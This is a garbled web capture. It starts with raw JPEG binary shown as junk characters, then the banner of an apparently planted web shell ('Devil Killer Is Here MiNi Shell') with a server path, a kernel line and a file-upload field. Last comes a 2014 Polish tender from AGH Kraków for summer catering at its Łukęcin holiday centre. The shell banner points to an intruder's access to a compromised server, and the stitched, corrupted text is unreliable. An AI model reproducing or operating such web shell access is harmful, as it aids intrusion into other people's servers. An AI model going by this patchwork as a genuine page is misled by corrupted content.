JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140318/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140318/91288-N-2014.html

<p class="kh_header"><b>Kraków: prowadzenie żywienia w Ośrodku Wczasowo-Kolonijnym AGH w Łukęcinie w sezonie letnim 2014 - KC-zp.272-78/14</b><br>
<b>Numer ogłoszenia: 91288 - 2014; data zamieszczenia: 18.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Górniczo - Hutnicza im. Stanisława Staszica , Al. Mickiewicza 30, 30-059 Kraków, woj. małopolskie, tel. 012 6173595, faks (012) 6173595, 6173363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzp.agh.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> prowadzenie żywienia w Ośrodku Wczasowo-Kolonijnym AGH w Łukęcinie w sezonie letnim 2014 - KC-zp.272-78/14.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> prowadzenie żywienia w Ośrodku Wczasowo-Kolonijnym AGH w Łukęcinie w sezonie letnim 2014 tj. od dnia  28.05.2014 r. do dnia 26.09.2014 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 28.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie obowiązuje</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w dialogu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, świadczył usługi restauracyjne  obejmujące przygotowanie i podawanie w miejscu świadczenia usługi średnio dziennie minimum 300 posiłków w postaci: śniadań lub obiadów lub kolacji lub obiadokolacji, przez okres co najmniej 3 kolejnych miesięcy w danym roku kalendarzowym. Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do wniosku wykazu usług oraz dowodów potwierdzających czy zostały wykonane lub są wykonywane należycie, metodą spełnia/nie spełnia. 
Dowodami, o których mowa powyżej są: 
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert; 
2) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt 1. 
W przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie - załącznik nr 4, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.

Wykonawca, może polegać na wiedzy i doświadczeniu innych podmiotów niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować 1 samochodem umożliwiającym transport artykułów spożywczych w wymaganych warunkach sanitarnych. 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do wniosku wykazu narzędzi i urządzeń metodą spełnia/nie spełnia. Wykonawca, może polegać na potencjale technicznym innych podmiotów niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do wniosku oświadczenia metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca przedstawi informacje banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości 200 000,00 zł (dwieście tysięcy złotych 00/100), wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia. Wykonawca, może polegać na  zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wniosek o dopuszczenie do udziału w postępowaniu, Pełnomocnictwo do reprezentowania wykonawcy (wykonawców występujących wspólnie), o ile ofertę składa pełnomocnik.  Jeżeli wykonawca, wykazując spełnianie warunków o których mowa w art. 22 ust. 1 ustawy (posiadania wiedzy i doświadczeniu, potencjale technicznym lub zdolnościach finansowych), polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda dokumentów tj: pisemnego zobowiązania podmiotów udostępniających, oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia zawierające w szczególności: a) zakresu dostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia. Załączniki nr: 4a i  4b (dodatkowo punktowane)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Obiektywne kryteria wyboru ograniczonej liczby kandydatów: ocenie punktowej podlegać będzie wymagane doświadczenie Wykonawcy w wykonywaniu usług restauracyjnych, w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w dialogu na podstawie wykazów wykonanych usług (Załączniki nr 4a i 4b) 
Zasady przyznawania punktów przez Zamawiającego:

1. Za świadczenie usług restauracyjnych obejmujących przygotowanie i podawanie w miejscu świadczenia usługi średnio dziennie minimum 300 posiłków w postaci: śniadań lub obiadów lub kolacji lub obiadokolacji, które trwały co najmniej 3 kolejne miesiące  w danym roku kalendarzowym - wskazane w załączniku nr 4a potwierdzone dowodami, Zamawiający przyzna 3 punkty za każdy rok (łącznie nie więcej niż 6 pkt.). Punktacji nie będzie podlegać świadczenie usług o których mowa w pkt III.3.2)
 
2. Za należycie wykonane usługi restauracyjne na łączną kwotę 200.000,00 zł - wskazane w załączniku nr 4b, potwierdzone referencjami, z których wynika należyte wykonanie usług Zamawiający przyzna 1 punkt za każde 200.000,00 zł łącznej wartości usług (łącznie nie więcej niż 10 pkt.). 

Jeżeli Wykonawca przedstawi dokumenty potwierdzające wykonanie usługi spełniającej warunki określone w pkt 1 i 2 otrzyma sumę punktów określonych powyżej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek zostanie uznany za spełniony łącznie, jeżeli spełni go w całości co najmniej jeden z Wykonawców ubiegających się wspólnie o udzielenie zamówienia. W przypadku, gdy Wykonawca nie wypełni bądź nie załączy wykazów usług (Załączniki  nr 4 a i 4b ), Zamawiający przyzna Wykonawcy 0 pkt. 
Zamawiający, zaprosi do dialogu konkurencyjnego 3 Wykonawców, którzy uzyskają najwyższą ocenę spełniania warunków, tj. najwyższą ilość punktów. W przypadku gdy identyczną ocenę spełniania warunków otrzyma kilku Wykonawców, co spowoduje, że nie będzie możliwe ograniczenie liczby Wykonawców, którzy zostaną zaproszeni do dialogu konkurencyjnego, Zamawiający zaprosi do dialogu konkurencyjnego wszystkich tych Wykonawców. Jeżeli liczba Wykonawców, którzy spełniają warunki udziału w postępowaniu, będzie mniejsza niż 3, Zamawiający zaprosi do dialogu konkurencyjnego wszystkich Wykonawców spełniających te warunki. Zamawiający zastrzega, że art. 26 ust. 2b ustawy Pzp, zgodnie z którym Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków znajduje zastosowanie wyłącznie w celu spełnienia warunku udziału w postępowaniu. Nie może natomiast służyć podwyższeniu punktacji celem uzyskania wyższej pozycji na liście rankingowej Wykonawców, którzy zostaną zaproszeni do dialogu (nie dotyczy Wykonawców wspólnie ubiegających się o udzielenie zamówienia). Zamawiający informuje również, iż odnośnie dodatkowych usług wykazanych przez Wykonawcę (Załączniki nr 4a i 4b), dyspozycja art. 26 ust. 3 oraz 4 ustawy Pzp, dotycząca wzywania Wykonawców do uzupełniania lub wyjaśniania oświadczeń i dokumentów mających na celu podwyższenie punktacji, nie ma zastosowania.</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Ocena oferowanego jadłospisu pod kątem zasad racjonalnego (prawidłowego)     żywienia - 30</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.agh.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ zostanie udostępniona Wykonawcom na podstawie art. 60e ustawy Prawo zamówień publicznych, wraz z Zaproszeniem do składania ofert..</p><p><b>IV.4.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> W trakcie dialogu z Wykonawcami poruszone zostaną kwestie związane ze sposobem realizacji zamówienia publicznego, tak by umożliwić Zamawiającemu wybór rozwiązań najbardziej odpowiadających jego potrzebom oraz dokonanie szczegółowego opisu przedmiotu zamówienia oraz warunków umowy. Celem negocjacji jest określenie przez Zamawiającego:
- organizacji sposobu wydawania posiłków,
- określenie wysokości kosztów surowców i produktów (tzw. wsad do kotła) niezbędnych do prawidłowej realizacji zamówienia,
- określenie kluczowych aspektów prowadzenia żywienia.

Wykonawca będzie świadczyć usługę żywienia w kuchni wraz z zapleczem żywieniowym i sali jadalnej zlokalizowanej w budynku Ośrodka Wczasowo - Kolonijnego AGH w Łukęcinie, w sezonie letnim 2014. Liczba wczasowiczów żywionych w ciągu sezonu wynosi około 1400 osób (siedem turnusów czternastodniowych) oraz 130 uczestników kolonii (trzy turnusy osiemnastodniowe). Posiłki będą przygotowywane na miejscu, w kuchni. Zamawiający nie dopuszcza dowozu posiłków. Zamawiający zastrzega, że faktyczna ilość usług składających się na przedmiot zamówienia może być niższa od ilości podanej w postępowaniu o zamówienie publiczne, i z tego tytułu Wykonawca nie będzie wywodził żadnych skutków prawnych w stosunku do Zamawiającego, w szczególności roszczeń majątkowych.

Wykonawca zobowiązany jest do:
-przestrzegania wymagań określonych w ustawie o bezpieczeństwie żywności i żywienia z dnia 25 sierpnia 2006 r. (tekst jednolity: Dz.U. z 2010 r. nr 136, poz. 914 z późn. zm.),
-przedstawienia oświadczenia o wdrożeniu i stosowaniu zasad systemu HACCP,
-wykonania zamówienie zgodnie z przepisami z zakresu ochrony środowiska, 
-utrzymania czystości i porządku ww. kompleksu żywieniowego,
-pokrycia kosztów zakupu środków czystości, niezbędnych do należytego funkcjonowania kompleksu żywieniowego (kuchnia, stołówka, pomieszczenia sanitarne, ciągi komunikacyjne) oraz kosztów odpowiedniej odzieży ochronnej dla pracowników,
-ponoszenia odpowiedzialności finansowej wobec Zamawiającego oraz państwowych jednostek organizacyjnych posiadających  uprawnienia kontrolne za jakość pracy personelu, jego dyscyplinę  oraz przestrzeganie przepisów BHP, p. ppoż., sanitarno - porządkowych, a także za należyte funkcjonowanie kuchni, stołówki i magazynów żywnościowych,
-zawarcia niezbędnych umów związanych z funkcjonowaniem kompleksu żywieniowego zgodnie z obowiązującymi przepisami (np. dezynsekcja, deratyzacja, utylizacja zużytego oleju jadalnego, odpadów żywnościowych (gastronomicznych), itp.) i ponoszenie kosztów z tego tytułu.

Zamawiający zobowiązany jest do:
1.	do nieodpłatnego udostępnienia Wykonawcy na czas realizacji zamówienia
a)pomieszczeń
-sala jadalna (44 stoliki, 178 krzeseł)
-kuchnia 
-pomieszczenia magazynowe
-zaplecze sanitarne
-9 pokoi dla personelu 
b)urządzeń kuchennych
-szafy mroźnicze		- 1 szt. (700 l, 9 lat)
-zamrażarki skrzyniowe	- 2 szt. (350 l, 9 lat)
- zamrażarki skrzyniowe	- 1 szt. (500 l, 6 lat)
-zamrażarki skrzyniowe	- 1 szt. (400 l, 1 rok)
-szafy chłodnicze		- 2 szt. (1 400 l, 8 lat)
-szafy chłodnicze		- 1 szt. (700 l, 8 lat)
-szafy chłodnicze		- 1 szt. (700 l, 7 lat)
-szafy chłodnicze		- 2 szt. (700 l, 12 lat)
-lodówka AMICA		- 1 szt. (200 l, 10 lat)
-lodówka ARDO		-1 szt. (250 l, 6 lat)
-kotły warzelne		- 3 szt. (150 l, 6 lat)
-trzon kuchenny elektryczny - 1 szt. (6 palników, 21 lat)
-stoły produkcyjne 		- 7 szt. (21 lat)
-szafki różne			- 2 szt. (21 lat)
-maszyna wielofunkcyjna	- 1szt. (24 lat )
-maszyna do obierania ziemniaków - 1 szt. (10 lat)
-naświetlacz jaj - 1 szt. (21 lat)
-wilk do mięsa z podstawą - 1 szt. (10 lat)
-kuchenka mikrofalowa - 1 szt. (7 lat)
-wózki transportowe - 3 szt. (21 lat)
-wózki kelnerskie - 6 szt. (9 lat) 
c)zastawa stołowa
-talerze głębokie do zupy - 350 szt.
-talerze duże i płytkie do dań głównych - 350 szt.
-talerze mniejsze i płytkie na przystawki  - 350 szt.
-talerzyki deserowe - 400 szt.
-kubki - 350 szt.
-sztućce (łyżki, widelce, noże, łyżeczki) - po 300 szt.
-wazy - 50 szt.
-półmiski - 50 szt.
-miski - 100 szt.
-dzbanki - 50 szt.
-solniczki, octowniki - 50 szt.
2.uzupełniania i zakupu na własny koszt (w miarę potrzeb) drobnego sprzętu oraz zastaw stołowych, sztućców itp., 
3.ponoszenia kosztów konserwacji oraz utrzymania w stanie należytej sprawności wszystkich maszyn i urządzeń kuchennych znajdujących się w kuchni (wraz z zapleczem żywieniowym),
4.ponoszenia kosztów za dostarczanie mediów do kompleksu żywieniowego oraz zużycia energii elektrycznej, wody, odprowadzenia ścieków, wywozie i unieszkodliwianiu nieczystości komunalnych, AGH nie ponosi odpowiedzialności za niezawinione przerwy w dostawie mediów,
5.ponoszenia kosztów konserwacji i legalizacji dźwigu oraz legalizacji kotłów warzelnych..</p><p><b>IV.4.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje nagród dla wykonawców..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2014 godzina 10:30, miejsce: w siedzibie zamawiającego, paw. C-2 pok. 117..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1/O udzielenie zamówienia ubiegać mogą się Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz. U. z 2013 r. poz.907) spełniający warunki określone w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych. 2/Wykonawcy, którzy nie wykażą spełniania warunków udziału w postępowaniu, podlegać będą wykluczeniu z udziału w postępowaniu 3/ Dokumenty, określone w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 19 luty 2013 r. poz. 231) należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę 4/ Ilekroć występuje wymóg podpisywania dokumentów lub oświadczeń lub też potwierdzania dokumentów za zgodność z oryginałem, należy przez to rozumieć że oświadczenia i dokumenty te powinny być opatrzone podpisem (podpisami) osoby (osób) uprawnionej (uprawnionych) do reprezentowania wykonawcy, zgodnie z zasadami reprezentacji wskazanymi we właściwym rejestrze lub osobę (osoby) upoważnioną do reprezentowania wykonawcy na podstawie pełnomocnictwa. 5/W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów udostępniających wykonawcy zasoby, 